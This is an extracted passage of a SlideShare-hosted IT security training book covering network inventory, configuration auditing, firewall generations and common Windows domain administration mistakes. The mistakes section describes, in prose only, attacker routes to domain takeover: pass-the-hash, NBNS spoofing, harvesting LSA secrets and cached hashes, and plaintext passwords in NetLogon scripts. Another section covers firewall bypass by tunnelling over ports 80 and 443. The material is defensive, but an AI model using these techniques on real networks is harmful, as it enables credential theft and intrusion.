SlideShare a Scribd company logo
173 | P a g e
Main Functionalities:
 Real-time, subnet-level tracking of unmanaged, networked devices
 Detailed hardware information including slot description, memory configuration and
network adaptor configuration
 Extended plug-and-play monitor data including secondary monitor information
 Detailed asset-tag and serial number information, as well as embedded pointed device,
fixed drive and CD-ROM data
 Multi-layer information model – the idea is to represent the same equipment and
connections in several layers, with technology-specific information included in the
dedicated layer providing a consistent view of the network for the operator without an
information overflow.
 The layers represent both physical and logical information of managed network,
including: physical network resources, infrastructure, physical connections, digital
transmission layer (SDH/SONET (STM-n, VC-4, VC-12, OC-n), PDH (E1, T1)),
174 | P a g e
telephony layer, IP-related layers, GSM/CDMA/UMTS-related layers as well as ATM
and FR layers
 History tracking - inventory objects (equipment, connections, numbering resources etc.)
are stored with full history of changes which enables change tracking; a new history entry
is made in three cases: object creation (the first history entry is made); object
modification (for each modification a new entry is added); and object removal (the last
history entry is made)
 Auto-discovery and reconciliation – enables to keep the stored information up-to-date
with the changes occurring in the network. The auto-discovery tool enables adding new
network elements to the inventory database, removing existing network elements from
the inventory database as well as updating the inventory database due to changed cards,
ports or interfaces
 Network planning – future object planning support (storing future changes in the
equipment, switches configuration, connections, etc.); plans are executed or applied by
the system logic – object creation / changing actually take place and planned objects
become active in the inventory system; enables visualization of the network state in the
future
 Inventory-Based Billing enables accurate calculations of customer charges for inventory
products and services (e.g. equipment, locations, connections, capacity); this module is
able to calculate charges for services leased from another operator (vendor) and resold
(with profit) to customers, and to generate invoices
 Inventory and Console Tools allow user-friendly management of important objects used
in the application (creating templates (Logical View, Report Management, Charts),
editing symbols and links, searching for objects, encrypting passwords and notifying
users of various actions/events)
 Wizards and templates provide flexibility but do not allow for inconsistent manipulation
of data; new objects are created with an object creation wizard (so called template),
which enables defining all attributes and necessary referential object (path details for
connections, detailed elements (cards, ports) for equipment etc.); the user can define
which attributes of an object should be mandatory / predefined and if they should have a
constant value
 Process-driven Inventory – by introduction of automated processes, all user tasks related
to inventory data are done in the context of a process instance; changing the state of the
network (e.g. by provisioning a new service) cannot be done without updating
information in the inventory; this assures real-time accuracy of the inventory database
 Information theft – A network inventory management system not only keeps track of
your hardware but also your software. It also shows you who has access to that software.
A regular check of your system's inventory will let you know who has downloaded and
used software they may not be authorized to use.
 Equipment theft – A network management system will automatically detect every piece
of equipment and software connected to your system. And it will also let you know which
items are not working properly, which items need to be replaced, and which items have
175 | P a g e
mysteriously disappeared. Eliminate workplace theft simply by running a regularly
scheduled inventory check.
 Licensing agreements – An inventory of your software and licensing agreements will let
you know if you've got the necessary licensing agreements for all your software.
Insufficient licensing can cost you usage fees and fines and duplicating software that you
already have is an unnecessary expense.
 System Upgrades – Outdated equipment and software can cost your company time,
money, and resources. Downtime and slow response times are two of the biggest time
killers for your business. Set filters on your network inventory management system to
alert you when it's time to upgrade software or replace hardware with newer technology
to keep your system running as smoothly and efficiently as possible.
Benefits:
 End-to-end view of multi-vendor, multi-technology networks
 Reduced network operating cost
 Improved utilization of existing resources
 Quicker, more efficient change management
 Visualization and control of distributed resources
 Seamless integration within the existing environment
 Automatically discovers and diagrams network topology
 Automatic generation of network maps in Microsoft Office Visio
 Automatically detects new devices and changes to network topology
 Simplifies inventory management for hardware and software assets
 Addresses reporting needs for PCI compliance and other regulatory requirements
powerful capabilities, including:
o Inventory management for all systems
o Direct access to Windows, Macintosh and Linux devices
o Automatically save hardware and software configuration information in a SQL
database
o Generate systems continuity and backup profiler reports
o Use remote management capabilities to shut down, restart and launch
applications
176 | P a g e
Completing the gaps with scripts
177 | P a g e
Creating Device Groups (Security Level, Same
Version…)
Creating Policies
Microsoft released Security Compliance Manager along with a heap of new
security baseline for you to use to compare against your environment. In case you
are not familiar with SCM then it is a great product from Microsoft that
consolidates all the best practice for their software with in-depth explanation for
each setting.
Notably this new version has security baselines for Exchange Server 2010 and 2007. These baselines are also
customized for the specific role of the server. Also interesting is the baseline settings not only include group policy
computer settings but also PowerShell command to configured aspects of the product that are not as simply to make as
a registry key change.
178 | P a g e
179 | P a g e
As you can see from the image below the PowerShell script to perform the required configuration is listed in the detail
pain…
Attachments and Guidelines
Another new feature you might notice is that there is now a section called Attachments and
Guidelines that has a lot of support documentation that relate to the Security baseline. This
section also allows you to add your own supporting documentation to your custom baseline
templates.
180 | P a g e
How to Import an existing GPO into Microsoft Security Compliance Manager v2
To start you simply need to make a backup of the existing Group Policy Object via the Group
Policy Management Console and then import it by selecting the “Import GPO” option in the new
tool at the top right corner (see image below).
181 | P a g e
Select the path to the backup of individual GPO (see image below).
182 | P a g e
Once you click OK the policy will then import into the SCM tool.
Once the GPO is imported the tool will look at the registry path and if it is a known value it will
then match it up with the additional information already contained in the SCM database (very
smart).
183 | P a g e
Now that you have the GPO imported into the SCM tool you can use the “compare” to see the
differences between this and the other baselines.
How to compare Baseline setting in the Security Compliance Manager tool
Simply select the policy you want to compare on the left hand column and then select the
“Compare” option on the right hand side (see image below).
184 | P a g e
Now select the Baseline policy you want to do the comparison with and press OK.
185 | P a g e
The result is a reporting showing the setting and values that are different between the two
policies.
186 | P a g e
The values tab will show you all the common settings between the policies that have different
values and the other tab will show you all the settings that are uniquely configured in either
policy.
187 | P a g e
Auditing to verify security in practice
How to avoid risk from inconsistent network and security
configuration practices?
Regulations define specific traffic and firewall policies that must be deployed, monitored,
audited, and enforced. Unfortunately, due to the silos organizations often lack the ability to
seamlessly assess when a network configuration allows traffic that is "out of policy" per
compliance, corporate mandate, or industry best practice.
Configuration Audit:
Configuration Audit tools provide automated collection, monitoring, and audit of configuration
across an organization's switches, routers, firewalls, and IDS/IPS. Through a unique ability to
normalize multi-vendor device configuration, provides a detailed and intuitive assessment of how
devices are configured, including defined firewall rules, security policy, and network hierarchy.
These solutions maintain a history of configuration changes, audit configuration rules on a
device, and compare this across devices. Intelligently integrated with network activity data,
device configuration data is instrumental in building an enterprise-wide representation of a
networks topology. This topology mapping helps an organization to understand allowed and
188 | P a g e
denied activity across the entire network, resulting in improved consistency of device
configuration and flagged configuration changes that introduce risk to the network.
Configuration Auditing Solution Vary To the following types:
1. Configuration Management Software – Usually provides a comparison between two
configuration sets and also a comparison a specific compliance template
2. Configuration Analyzers – Mostly common in analyzing Firewall configurations known
as “Firewall Analyzer” and “Firewall Configuration Analyzer”
3. Local Security Compliance Scanners – Tools such as “MBSA” Microsoft Baseline
Security Analyzer tools provide local system configuration analysis
4. Vulnerability Assessment Products – aka “Security Scanners”
Vulnerability scanners can be used to audit the settings and configuration of operating systems,
applications, databases and network devices. Unlike vulnerability testing, an audit policy is used
to check various values to ensure that they are configured to the correct policy. Example policies
for auditing include password complexity, ensuring the logging is enabled and testing that anti-
virus software is installed properly.
Audit policies of common vulnerability scanners have been certified by the US Government or
Center for Internet Security to ensure that the auditing tool accurately tests for best practice and
required configuration settings.
When combined with vulnerability scanning and real-time monitoring with the auditing
tools offer some powerful features such as:
 Detecting system change events in real-time and then performing a configuration audit
 Ensuring that logging is configured correctly for Windows and Unix hosts
 Auditing the configuration of a web application's operating system, application and SQL
database
Audit policies may also be deployed to search for documents that contain sensitive data such as
credit card or Social Security numbers. A basic tenet of most IT management practices is to
minimize variance. Even though your organization may consist of certain types of operating
systems and hardware, small changes in drivers, software, security policies, patch updates and
sometimes even usage can have dramatic effects on the underlying configuration. As time goes
by, these servers and desktop computers can have their configuration drift further away from a
"known good" standard, which makes maintaining them more difficult.
The following are the most common types of auditing provided by security auditing tools:
 Application Auditing
Configuration settings of applications such as web servers and anti-virus can be tested
against a policy.
 Content Auditing
Office documents and files can be searched for credit card numbers and other sensitive
content.
 Database Auditing
189 | P a g e
SQL database settings as well as setting so the host operating systems can be tested for
compliance.
 Operating System Auditing
Access control, system hardening, error reporting, security settings and more can be
tested against many types of industry and government policies.
 Router Auditing
Authentication, security and configuration settings can be audited against a policy.
Agentless vs. Agent-Based Security Auditing Solutions
The chart below provides a high level view of agent-based versus agentless systems; details
follow.
Solution Characteristic Agentless Agent-Based
Asset Discovery Advantage None/Limited
Asset Coverage Advantage Limited
Audit Comprehensiveness Par Par
Target System Impact Advantage Variable
Target System Security Advantage Variable
Network Impact Variable/Low Low
Cost of Deployment Advantage High
Cost of Ownership Advantage High
Scalability Advantage Limited
Functionalities:
1. Asset Discovery: the ability to discover and maintain an accurate inventory of IT
assets and applications.
Agentless solutions typically have broader discovery capabilities – including both active
and passive technologies – that permit them to discover a wider range of assets. This
includes discovery of assets that may be unknown to administrators or should not be on
your network.
2. Asset Coverage: the breadth of IT assets and applications that can be assessed.
Many IT assets that need to be audited simply cannot accept agent software. Examples
include network devices like routers and switches, point-of-sale systems, IP phones and
many firewalls.
3. Audit Comprehensiveness: the degree of completeness with which the auditing
system can assess the target system’s security and compliance status.
Using credentialed access, agentless solutions can assess any configuration or data item
on the target system, including an analysis of system file integrity (file integrity
monitoring).
4. Target System Impact: the impact on the stability and performance of the scan
target.
Agentless solutions use well-defined remote access interfaces to log in and retrieve the
desired data, and as a result have a much more benign impact on the stability of the assets
being scanned than agent-based systems do.
190 | P a g e
5. Target System Security: the impact of the auditing system on the security of the
target system.
Agentless auditing solutions are uniquely positioned to conduct objective and trusted
security analyses because they do not run on the target system.
6. Network Impact: the impact on the performance of the associated network.
Although agentless auditing solutions gather target system configuration information
using a network-based remote login, actual network impact is marginal due to bandwidth
throttling and overall low usage.
7. Cost of Deployment: the time and effort required to make the auditing system
operational.
Since there are no agents to install, getting started with agentless solutions is significantly
faster than with agent-based solutions – typically hours rather than days or weeks.
8. Cost of Ownership: the time and effort required to update and adjust the
configuration of the auditing system.
Agentless solutions typically have much lower costs of ownership than agent-based
systems; deployment is easier and faster, there are fewer components to update and
configuration is centralized on one or two systems.
9. Scalability: the number of target systems that a single instance of the audit system
can reliably audit in a typical audit interval.
Agentless auditing solutions excel in scalability, as auditing scalability is virtually
unlimited simply by increasing the number of management servers.
10. Simplified configuration compliance
Simplifies configuration compliance with drag-and-drop templates for Windows and
Linux operating systems and applications from FDCC, NIST, STIGS, USGCB and
Microsoft. Prioritize and manage risk, audit configurations against internal policy or
external best practice and centralize reporting for monitoring and regulatory purposes.
11. Complete configuration assessment
Provides a comprehensive view of Windows devices by retrieving software configuration
that includes audit settings, security settings, user rights, logging configuration and
hardware information including memory, processors, display adapters, storage devices,
motherboard details, printers, services, and ports in use.
12. Out-of-the-box configuration auditing
Out-of-the-box configuration auditing, reporting, and alerting for common industry
guidelines and best practices to keep your network running, available, and accessible.
13. Datasheet configuration auditing
Compare assets to industry baselines and best practices to check whether any software or
hardware changes were made since the last scan that could impact your security and
compliance objectives.
14. Up-to-date baselines
With this module, a complete configuration compliance benchmark library keeps systems
up-to-date with industry benchmarks including changes to benchmarks and adjustments
for newer operating systems and applications.
15. Customized best practices
Customized best practices for improved policy enforcement and implementation for a
broad set of industry templates and standards including built-in configuration templates
for NIST, Microsoft, and more.
16. Built- in templates
191 | P a g e
Built-in templates for Windows and Linux operating systems and applications from
FDCC, NIST, STIGS, USGCB, and Microsoft.
17. Oval 5.6 SCAP support
18. Streamlined reporting
Streamlined reporting for government and corporate standards with built-in vulnerability
reporting.
192 | P a g e
Case Studies Summary: Top 10 Mistakes -
Managing Windows Networks
“The shoemaker's son always goes barefoot”
 Network Administrators who uses Windows XP or Windows 7 without UAC on their
own computer
 Network Administrators who have a weak password for a local administrator account on
their machine
o An Example from a real client: Zorik:12345
 Network Administrators that their computer in excluded from security scans
 Network Administrators that their computer lacks security patches
 Network Administrators that their computer doesn’t have an Anti-Virus
 Network Administrators with unencrypted Laptops
Domain Administrators on Users VLAN
 In most organizations administrators and user are connected to the same VLAN
 In this case, a user/attacker can:
o Attack the administrators computers using NetBIOS Brute Force
o Spoof a NetBIOS name of a local server and attack using an NBNS Race
Condition Name Spoofing
o Take Over the network traffic using a variety of Layer 2 attacks and:
 Replace/Infect EXE files that will execute with network administrator
privileges
 Steal Passwords & Hashes of Domain Administrators
 Execute Man-In-The-Middle attacks on encrypted connections (RDP,
SSH, SSL)
193 | P a g e
Domain Administrator with a Weak Password
194 | P a g e
Domain Administrator without the Conficker Patch (MS08-
067)
195 | P a g e
(LM and NTLM v1) vs. (NTLM v.2)
 Once the hash of a network administrator is sent over the network, his identity can be
stolen by:
o The can be used in Pass-The-Hash attack
o The hash can be broken via Dictionary, Hybrid, Brute Force, Rainbow Tables
attacks
196 | P a g e
197 | P a g e
Pass the Hash Attack
198 | P a g e
Daily logon as a Domain Administrator
1. Is there an entity among man which answers the definition “God”? (Obviously no…)
a. Computers shouldn’t have one either (refers to “Domain Administrator” default
privilege level)
b. Isn’t a network administrator a normal user when he connects to his machine?
c. Doesn’t the network administrator surf the internet?
d. Doesn’t he visit Facebook?
e. Doesn’t he receive emails and opens them?
f. Doesn’t he download and installs applications?
g. Can’t the application he downloaded contain a malware/virus?
h. What can a virus do running under Domain Administrator privileges?
i. What is the potential damage to data, confidentiality and operability in costs?
Using Domain Administrator for Services
 Why does MSSQL “require” Domain Administrator privileges? (It doesn’t…)
 When a password is assigned to a service, the raw data of the password is stored locally
and can be extracted by a remote user with local administrative account
 The scenario of a service actually requiring Domain Administrator privileges is
extremely rare (almost doesn’t exist) and is mostly a wrong analysis/laziness of real
requirements by the decision maker
199 | P a g e
 In the most common case where a service requires an account which is different from
SYSTEM it only requires a local/domain user with only LOCAL administrative
privileges
 In the cases where a network manager or a service requires “the highest privileges”, they
only require local administrator on clients and/or operational servers but not the Domain
Administrator privilege. (which has login privileges to manage the domain controllers,
DNS servers, backup servers, most of today’s enterprise applications which integrate into
active directory)
Managing the network with Local Administrator Accounts
 In most cases the operational requirement is:
o The ability to install software on servers and client endpoint machines
o Connecting remotely to machines via C$ (NetBIOS) and Remote Registry
o Executing remote network scanning
o It is possible to execute 99% percent of the tasks using Separation of Duties,
assigning each privilege to a single user/account
 Users_Administrator_Group – Local Administrators
 Servers_Administrators_Group – Local Administrators
 Change Password Privilege
The NetLogon Folder
 Improper use of the Netlogon folder is the classic way to get Domain Administrator
privileges for a long term
 The most common cases are:
o Administrative Logon scripts with clear text passwords to domain administrator
accounts or local administrator account on all machines
o Free write/modify permission into the directory
 A logical problem, completely un-noticed, almost undetectable
 The longer the organization’s IT systems exist, the more “treasures” to discover
200 | P a g e
The NetLogon Folder - test.kix – Revealing the Citrix UI Password
The NetLogon Folder - addgroup.cmd – Revealing the local Administrator of THE
ENTIRE NETWORK
201 | P a g e
The NetLogon Folder - password.txt – can’t get any better for a hacker
LSA Secrets & Protected Storage
 The windows operating system implements an API to work securely with passwords
 Encryption keys are stored on the system and the encrypted data is stored in its registry
o Internet Explorer
o NetBIOS Saved Passwords
o Windows Service Manager
202 | P a g e
LSA Secrets
203 | P a g e
204 | P a g e
Protected Storage
205 | P a g e
Wireless Passwords
Cached Logons
 A user at his home, unplugged from the organizational internal network, trying to log into
to his laptop cannot log into the domain
 Therefore, the network logon is simulated:
o The hash of the user’s password is saved on his machine
o When the user inputs his password, it is converted into a hash and compared to
the list of saved hashes, if a match is found, the system logs the user in
 The vulnerability: the default setting in windows is saving hashes of all the last 10
unique/different passwords used to connect to this machine locally
 In most cases, the hash of a domain administrator privileged account is on that list
206 | P a g e
 Most organizations don’t distinguish between PCs, Servers and Laptops when it comes to
the settings for this feature
 Most organizations don’t harden:
o The local PCs cached logons amount to 0
o The Laptops cached logons amount to 1
o The Servers to 0 (unless its mission critical, then 1 to 3 are recommended)
 It means that at least 50% of the machines contains a domain administrator’s hash and
can take over the entire network
 Conclusion: A user/attacker with local administrator privileges can get a domain
administrator account from most of the organization’s computers
Password History
 In order to avoid users recycling their passwords o every forced password change, the
system the system saves the hash passwords locally
 By default, their last 24 passwords are saved on the machine
 An attacker with local administrator privileges on the machine, gets all the “password
patterns” of all the user accounts who ever logged into this machine
 A computer who was used only by 2 people, will contains up to 48 different passwords
 Some of these passwords are usually used for other accounts in the organization
Users as Local Administrators
 When a user is logged on with local administrator privileges, the local system’s entire
integrity is at risk
 He can install privileged software and drivers such as promiscuous network drivers for
advanced network and Man-In-The-Middle attacks and Rootkits
 He is able to extract the hashes of all the old passwords of the users who ever logged to
the current machine
 He is able to extract the hashed of all the CURRENT passwords of the users who ever
logged to the current machine
207 | P a g e
Forgetting to Harden: RestrictAnonymous=1
Weak Passwords / No Complexity Enforcement
 Weak Passwords = A successful Brute Force
 Complexity Compliant Passwords -> which appear in a passwords dictionary
“Password1!”
 Old passwords or default passwords of the organization
Guess what the password was? (gma )
208 | P a g e
Firewalls
Understanding Firewalls (1, 2, 3, 4, 5 generations)
A firewall is a device or set of devices designed to permit or deny network transmissions based upon a set
of rules and is frequently used to protect networks from unauthorized access while permitting legitimate
communications to pass.
Many personal computer operating systems include software-based firewalls to protect against threats from
the public Internet. Many routers that pass data between networks contain firewall components and,
conversely, many firewalls can perform basic routing functions.
First generation: packet filters
The first paper published on firewall technology was in 1988, when engineers from Digital Equipment
Corporation (DEC) developed filter systems known as packet filter firewalls. This fairly basic system was
the first generation of what became a highly involved and technical internet security feature. At AT&T Bell
Labs, Bill Cheswick and Steve Bellovin were continuing their research in packet filtering and developed a
working model for their own company based on their original first generation architecture.
Packet filters act by inspecting the "packets" which transfer between computers on the Internet. If a packet
matches the packet filter's set of rules, the packet filter will drop (silently discard) the packet, or reject it
(discard it, and send "error responses" to the source).
This type of packet filtering pays no attention to whether a packet is part of an existing stream of traffic
(i.e. it stores no information on connection "state"). Instead, it filters each packet based only on information
contained in the packet itself (most commonly using a combination of the packet's source and destination
address, its protocol, and, for TCP and UDP traffic, the port number).
TCP and UDP protocols constitute most communication over the Internet, and because TCP and UDP
traffic by convention uses well known ports for particular types of traffic, a "stateless" packet filter can
distinguish between, and thus control, those types of traffic (such as web browsing, remote printing, email
transmission, file transfer), unless the machines on each side of the packet filter are both using the same
non-standard ports.
Packet filtering firewalls work mainly on the first three layers of the OSI reference model, which means
most of the work is done between the network and physical layers, with a little bit of peeking into the
transport layer to figure out source and destination port numbers.[8]
When a packet originates from the
sender and filters through a firewall, the device checks for matches to any of the packet filtering rules that
are configured in the firewall and drops or rejects the packet accordingly. When the packet passes through
the firewall, it filters the packet on a protocol/port number basis (GSS). For example, if a rule in the
firewall exists to block telnet access, then the firewall will block the TCP protocol for port number 23.
209 | P a g e
Second generation: "stateful" filters
From 1989-1990 three colleagues from AT&T Bell Laboratories, Dave Presetto, Janardan Sharma, and
Kshitij Nigam, developed the second generation of firewalls, calling them circuit level firewalls.
Second-generation firewalls perform the work of their first-generation predecessors but operate up to layer
4 (transport layer) of the OSI model. They examine each data packet as well as its position within the data
stream. Known as stateful packet inspection, it records all connections passing through it determines
whether a packet is the start of a new connection, a part of an existing connection, or not part of any
connection. Though static rules are still used, these rules can now contain connection state as one of their
test criteria.
Certain denial-of-service attacks bombard the firewall with thousands of fake connection packets to in an
attempt to overwhelm it by filling up its connection state memory.
Third generation: application layer
The key benefit of application layer filtering is that it can "understand" certain applications and protocols
(such as File Transfer Protocol, DNS, or web browsing), and it can detect if an unwanted protocol is
sneaking through on a non-standard port or if a protocol is being abused in any harmful way.
The existing deep packet inspection functionality of modern firewalls can be shared by Intrusion-
prevention Systems (IPS).
Currently, the Middlebox Communication Working Group of the Internet Engineering Task Force (IETF)
is working on standardizing protocols for managing firewalls and other middleboxes.
Another axis of development is about integrating identity of users into Firewall rules. Many firewalls
provide such features by binding user identities to IP or MAC addresses, which is very approximate and
can be easily turned around. The NuFW firewall provides real identity-based firewalling, by requesting the
user's signature for each connection. Authpf on BSD systems loads firewall rules dynamically per user,
after authentication via SSH.
Application firewall
An application firewall is a form of firewall which controls input, output, and/or access from, to,
or by an application or service. It operates by monitoring and potentially blocking the input,
output, or system service calls which do not meet the configured policy of the firewall. The
application firewall is typically built to control all network traffic on any OSI layer up to
the application layer. It is able to control applications or services specifically, unlike a stateful
network firewall which is - without additional software - unable to control network traffic
regarding a specific application. There are two primary categories of application
firewalls, network-based application firewalls and host-based application firewalls.
210 | P a g e
Network-based application firewalls
A network-based application layer firewall is a computer networking firewall operating at the application
layer of a protocol stack, and are also known as a proxy-based or reverse-proxy firewall. Application
firewalls specific to a particular kind of network traffic may be titled with the service name, such as a web
application firewall. They may be implemented through software running on a host or a stand-alone piece
of network hardware. Often, it is a host using various forms of proxy servers to proxy traffic before passing
it on to the client or server. Because it acts on the application layer, it may inspect the contents of the
traffic, blocking specified content, such as certain websites, viruses, and attempts to exploit known logical
flaws in client software.
Modern application firewalls may also offload encryption from servers, block application input/output from
detected intrusions or malformed communication, manage or consolidate authentication, or block content
which violates policies.
Host-based application firewalls
A host-based application firewall can monitor any application input, output, and/or system service calls
made from, to, or by an application. This is done by examining information passed through system calls
instead of or in addition to a network stack. A host-based application firewall can only provide protection
to the applications running on the same host.
Application firewalls function by determining whether a process should accept any given connection.
Application firewalls accomplish their function by hooking into socket calls to filter the connections
between the application layer and the lower layers of the OSI model. Application firewalls that hook into
socket calls are also referred to as socket filters. Application firewalls work much like a packet filter but
application filters apply filtering rules (allow/block) on a per process basis instead of filtering connections
on a per port basis. Generally, prompts are used to define rules for processes that have not yet received a
connection. It is rare to find application firewalls not combined or used in conjunction with a packet filter.
Also, application firewalls further filter connections by examining the process ID of data packets against a
ruleset for the local process involved in the data transmission. The extent of the filtering that occurs is
defined by the provided ruleset. Given the variety of software that exists, application firewalls only have
more complex rule sets for the standard services, such as sharing services. These per process rule sets have
limited efficacy in filtering every possible association that may occur with other processes. Also, these per
process ruleset cannot defend against modification of the process via exploitation, such as memory
corruption exploits. Because of these limitations, application firewalls are beginning to be supplanted by a
new generation of application firewalls that rely on mandatory access control (MAC), also referred to as
sandboxing, to protect vulnerable services. Examples of next generation host-based application firewalls
which control system service calls by an application are AppArmor and the TrustedBSD MAC framework
(sandboxing) in Mac OS X.
Host-based application firewalls may also provide network-based application firewalling.
211 | P a g e
Distributed web application firewalls
Distributed Web Application Firewall (also called a dWAF) is a member of the web application firewall
(WAF) and Web applications security family of technologies. Purely software-based, the dWAF
architecture is designed as separate components able to physically exist in different areas of the network.
This advance in architecture allows the resource consumption of the dWAF to be spread across a network
rather than depend on one appliance, while allowing complete freedom to scale as needed. In particular, it
allows the addition / subtraction of any number of components independently of each other for better
resource management. This approach is ideal for large and distributed virtualized infrastructures such as
private, public or hybrid cloud models.
Cloud-based web application firewalls
Cloud-based Web Application Firewall is also member of the web application firewall (WAF)
and Web applications security family of technologies. This technology is unique due to the fact
that it is platform agnostic and does not require any hardware or software changes on the host,
just a DNS change. By applying this DNS change, all web traffic is routed through the WAF
where it is inspected and threats are thwarted. Cloud-based WAFs are typically centrally
orchestrated, which means that threat detection information is shared among all the tenants of the
service. This collaboration results in improved detection rates and lower false positives. Like
other cloud-based solutions, this technology is elastic, scalable and is typically offered as a pay-
as-you grows service. This approach is ideal for cloud-based web applications and small or
medium sized websites that require web application security but are not willing or able to make
software or hardware changes to their systems.
 In 2010, Imperva spun out Incapsula to provide a cloud-based WAF for small to medium
sized businesses.
 Since 2011, United Security Providers provides the Secure Entry Server as an Amazon EC2
Cloud-based Web Application Firewall
 Akamai Technologies offers a cloud-based WAF that incorporates advanced features such as
rate control and custom rules enabling it to address both layer 7 and DDoS attacks.
The Common Firewall’s Limits
1. The common firewall works on ACL rules where something is allowed or denied based
on a simple set of parameters such as Source IP, Destination IP, Source Port and
Destination Port.
2. Most firewalls don’t support application level rules that would allow the creation of smart
rules that match today’s more active application-rich technology world.
3. Every hacker knows that 99.9% from the firewalls on planet earth are configured to
allow connections to remote machines at TCP port 80, since this is the port of the
“WEB”, used by HTTP.
4. Today’s firewalls will allow any kind of traffic to leave the organization on port 80, this
means that:
212 | P a g e
 Hackers can use “network tunneling” technology to transfer ANY kind of
information on port 80 and therefore bypass all of the currently deployed firewalls
 In terms of traffic and content going through a port defined to be open, such as port 80,
Firewalls are configured to act as a blacklist, therefore tunneling an ENCRYPTED
connection such as SSL and SSH on port 80, will bypass all of the firewall’s
potential inspection features.
 The problem gets worse when ports that allow encryption connections are commonly
available, such as port 443, which supports the encrypted HTTPS protocol. Hackers
can tunnel any communication on port 443 and encrypt it with HTTPS to imitate
the behavior of any standard browser.
 The firewalls which do inspect SSL traffic relay on the assumption that they will
generate and sign a certificate on their own for the browsed domain and the browser
will accept it since they are defined on the machine as a trusted Certificate Authority.
However, as firewalls work mostly on blacklist mode, they will still forward any
traffic that they fail to open and inspect.
Implementing Application Aware Firewalls
Features
Palo Alto Networks has built a next-generation firewall with several innovative technologies
enabling organizations to fix the firewall. These technologies bring business-relevant elements
(applications, users, and content) under policy control on high performance firewall architecture.
This technology runs on a high-performance, purpose-built platform based on Palo Alto
Networks' Single-Pass Parallel Processing (SP3) Architecture. Unique to the SP3 Architecture,
traffic is only examined once, using hardware with dedicated processing resources for security,
networking, content scanning and management to provide line-rate, low-latency performance
under load.
Application Traffic Classification
Accurate traffic classification is the heart of any firewall, with the result becoming the basis of
the security policy. Traditional firewalls classify traffic by port and protocol, which, at one point,
was a satisfactory mechanism for securing the perimeter.
Today, applications can easily bypass a port-based firewall; hopping ports, using SSL and SSH,
sneaking across port 80, or using non-standard ports. App-IDTM, a patent-pending traffic
classification mechanism that is unique to Palo Alto Networks, addresses the traffic classification
limitations that plague traditional firewalls by applying multiple classification mechanisms to the
213 | P a g e
traffic stream, as soon as the device sees it, to determine the exact identity of applications
traversing the network.
Classify traffic based on applications, not ports.
App-ID uses multiple identification mechanisms to determine the exact identity of applications
traversing the network. The identification mechanisms are applied in the following manner:
 Traffic is first classified based on the IP address and port.
 Signatures are then applied to the allowed traffic to identify the application based on unique
application properties and related transaction characteristics.
 If App-ID determines that encryption (SSL or SSH) is in use and a decryption policy is in
place, the application is decrypted and application signatures are applied again on the
decrypted flow.
 Decoders for known protocols are then used to apply additional context-based signatures to
detect other applications that may be tunneling inside of the protocol (e.g., Yahoo! Instant
Messenger used across HTTP).
 For applications that are particularly evasive and cannot be identified through advanced
signature and protocol analysis, heuristics or behavioral analysis may be used to determine the
identity of the application.
As the applications are identified by the successive mechanisms, the policy check determines how to
treat the applications and associated functions: block them, or allow them and scan for threats, inspect
for unauthorized file transfer and data patterns, or shape using QoS.
214 | P a g e
Always on, always the first action taken across all ports.
Classifying traffic with App-ID is always the first action taken when traffic hits the firewall, which
means that all App-IDs are always enabled, by default. There is no need to enable a series of
signatures to look for an application that is thought to be on the network; App-ID is always classifying
all of the traffic, across all ports - not just a subset of the traffic (e.g., HTTP). All App-IDs are looking
at all of the traffic passing through the device; business applications, consumer applications, network
protocols, and everything in between.
App-ID continually monitors the state of the application to determine if the application changes
midstream, providing the updated information to the administrator in ACC, applies the appropriate
policy and logs the information accordingly. Like all firewalls, Palo Alto Networks next-generation
firewalls use positive control, default denies all traffic, then allow only those applications that are
within the policy. All else is blocked.
All classification mechanisms, all application versions, all OSes.
App-ID operates at the services layer, monitoring how the application interacts between the client and
the server. This means that App-ID is indifferent to new features, and it is client or server operating
system agnostic. The result is that a single App-ID for Bit Torrent is going to be roughly equal to the
many Bit Torrent OS and client signatures that need to be enabled to try and control this application in
other offerings.
Full visibility and control of custom and internal applications.
Internally developed or custom applications can be managed using either an application override or
custom App-IDs. An applications override effectively renames the traffic stream to that of the internal
application. The other mechanism would be to use the customizable App-IDs based on context-based
signatures for HTTP, HTTPs, FTP, IMAP, SMTP, RTSP, Telnet, and unknown TCP /UDP traffic.
Organizations can use either of these mechanisms to exert the same level of control over their internal
or custom applications that may be applied to SharePoint, Salesforce.com, or Facebook.
Securely Enabling Applications Based on Users & Groups
Traditionally, security policies were applied based on IP addresses, but the increasingly dynamic
nature of users and applications means that IP addresses alone have become ineffective as a
mechanism for monitoring and controlling user activity. Palo Alto Networks next-generation firewalls
integrate with a wide range of user repositories and terminal service offerings, enabling organizations
to incorporate user and group information into their security policies. Through User-ID, organizations
also get full visibility into user activity on the network as well as user-based policy-control, log
viewing and reporting.
215 | P a g e
Transparent use of users and groups for secure application enablement.
User-ID seamlessly integrates Palo Alto Networks next-generation firewalls with the widest range of
enterprise directories on the market; Active Directory, eDirectory, OpenLDAP and most other LDAP
based directory servers. The User-ID agent communicates with the domain controllers, forwarding the
relevant user information to the firewall, making the policy tie-in completely transparent to the end-
user.
Identifying users via a browser challenge.
In cases where a user cannot be automatically identified through a user repository, a captive portal can
be used to identify users and enforce user based security policy. In order to make the authentication
process completely transparent to the user, Captive Portal can be configured to send a NTLM
authentication request to the web browser instead of an explicit username and password prompt.
Integrate user information from other user repositories.
In cases where organizations have a user repository or application that already has knowledge of users
and their current IP addresses, an XML-based REST API can be used to tie the repository to the Palo
Alto Networks next-generation firewall.
216 | P a g e
Transparently extend user-based policies to non-Windows devices.
User-ID can be configured to constantly monitor for logon events produced by Mac OS X, Apple iOS,
Linux/UNIX clients accessing their Microsoft Exchange email. By expanding the User-ID support to
non-Windows platforms, organizations can deploy consistent application enablement policies.
Visibility and control over terminal services users.
In addition to support for a wide range of directory services, User-ID provides visibility and policy
control over users whose identity is obfuscated by a Terminal Services deployment (Citrix or
Microsoft). Completely transparent to the user, every session is correlated to the appropriate user,
which allows the firewall to associate network connections with users and groups sharing one host on
the network. Once the applications and users are identified, full visibility and control within ACC,
policy editing, logging and reporting is available.
High Performance Threat Prevention
Content-ID combines a real-time threat prevention engine with a comprehensive URL database and
elements of application identification to limit unauthorized data and file transfers, detect and block a
wide range of threats and control non-work related web surfing. The application visibility and control
delivered by App-ID, combined with the content inspection enabled by Content-ID means that IT
departments can regain control over application traffic and the related content.
217 | P a g e
NSS-rated IPS.
The NSS-rated IPS blocks known and unknown vulnerability exploits, buffer overflows, D.o.S attacks
and port scans from compromising and damaging enterprise information resources. IPS mechanisms
include:
 Protocol decoder-based analysis statefully decodes the protocol and then intelligently applies
